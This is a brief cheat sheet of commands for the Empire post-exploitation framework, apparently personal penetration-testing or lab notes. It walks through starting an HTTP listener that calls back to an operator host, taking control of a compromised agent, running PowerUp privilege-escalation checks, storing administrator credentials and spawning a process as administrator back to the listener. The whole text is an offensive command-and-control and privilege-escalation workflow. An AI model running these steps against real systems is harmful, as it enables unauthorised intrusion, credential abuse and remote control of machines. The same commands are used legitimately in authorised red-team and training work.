Empire is a PowerShell and Python post-exploitation agent.
listeners
uselistener http
info
set Host http://<ip>:<port>
set Port <port>
execute
back
back
interact <agent-id>
searchmodule PowerUp
usemodule privesc/powerup/allcheck
execute
creds add <DefaultDomainName> administrator <pw>
usemodule management/spawnas
info
set Domain <DefaultDomainName>
set UserName administrator
set Password <pw>
set Listener http
execute